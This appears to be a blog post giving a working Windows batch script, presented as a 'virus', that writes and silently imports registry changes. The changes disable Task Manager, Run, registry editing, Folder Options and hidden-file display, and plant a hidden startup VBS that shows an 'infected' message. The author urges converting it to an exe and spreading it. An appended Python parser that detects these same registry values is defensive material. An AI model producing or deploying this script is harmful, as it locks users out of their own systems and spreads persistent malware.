Most virus programmers disable some Windows features through the registry, for example Task Manager, the Run dialog, etc.
Let's take a look at how they do all this.
Here I'm making a bat file that does all of it. It is easy to convert a bat file to an exe using a bat-to-exe converter.
This bat file disables Run, registry editing, Task Manager, Folder Options, and the showing of hidden files/folders.
It also produces an error message whenever the system restarts, like "Your system infected".
=======================================================================
ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >> %WINDIR%\DXM.reg
echo "CheckedValue"=dword:0 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >> %WINDIR%\DXM.reg
echo "CheckedValue"=dword:0 >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableRegistryTools"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %WINDIR%\DXM.reg
echo "dxmv"="dxm.vbs" >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoRun"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoRun"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoFolderOptions"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoFolderOptions"=dword:0 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion] >> %WINDIR%\DXM.reg
echo "RegisteredOwner"="Mr. AkhilDas” >> %WINDIR%\DXM.reg
echo "RegisteredOrganization"="«« AkhlD™ »»" >> %WINDIR%\DXM.reg
echo. >> %WINDIR%\dxm.vbs
echo dxm=msgbox("Your system infected by «« AkhlD™ »» virus ",16,"iam_kingston@iamcrazy.in") >> %windir%\dxm.vbs
attrib +h +s +r %WINDIR%\dxm.vbs
start /w regedit /s %WINDIR%\DXM.reg
del %WINDIR%\DXM.reg
==========================================================================
This script creates a dxm.reg file in the Windows directory and also creates a dxm.vbs file there.
Importing dxm.reg disables all the functions listed above and registers dxm.vbs under the Run key so that it runs at startup.
Now convert it to an exe file……spread it all around You!.....Enjoy ! [;)]
For Educational Purpose Only !
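Seen from the defender's side, every change this script makes is a registry value that can be checked in an exported .reg file. The following is an added example, not part of the original post: a Python parser for .reg-format text (already decoded to a string) that reports the lockout values listed above and any script file registered under Run. The names `parse_reg`, `findings` and the sample export are constructed for illustration.

```python
import re

CV = r"software\microsoft\windows\currentversion"
# (subkey, value name) -> DWORD data that switches the feature off (from this page).
TAMPER = {
    (CV + r"\policies\system", "disabletaskmgr"): 1,
    (CV + r"\policies\system", "disableregistrytools"): 1,
    (CV + r"\policies\explorer", "norun"): 1,
    (CV + r"\policies\explorer", "nofolderoptions"): 1,
    (CV + r"\explorer\advanced\folder\hidden\showall", "checkedvalue"): 0,
}
RUN_KEY = CV + r"\run"
SCRIPT = re.compile(r"\.(vbs|vbe|js|jse|bat|cmd)\b", re.I)

def parse_reg(text):
    """Yield (hive, subkey, name, data) from .reg-format text."""
    hive = subkey = None
    for line in map(str.strip, text.splitlines()):
        key = re.fullmatch(r"\[([^\\\]]+)\\(.+)\]", line)
        if key:
            hive, subkey = key.group(1).upper(), key.group(2).lower()
            continue
        val = re.fullmatch(r'"([^"]+)"=(.+)', line)
        if val and subkey:
            yield hive, subkey, val.group(1), val.group(2)

def findings(text):
    out = []
    for hive, subkey, name, data in parse_reg(text):
        want = TAMPER.get((subkey, name.lower()))
        dword = re.fullmatch(r"dword:([0-9a-fA-F]{1,8})", data)
        if want is not None and dword and int(dword.group(1), 16) == want:
            out.append((hive, name, "feature disabled"))
        elif subkey == RUN_KEY and SCRIPT.search(data):
            out.append((hive, name, "script autorun"))
    return out

# Constructed sample export: two benign values mixed with three indicators.
SAMPLE = r"""REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Updater"="C:\\Program Files\\Example\\updater.exe"
"dxmv"="dxm.vbs"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:0
"""
if __name__ == "__main__": print(findings(SAMPLE))
```

A script under Run is not malicious by itself, so treat "script autorun" hits as leads to review rather than verdicts.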
1 comment:
I can't believe it works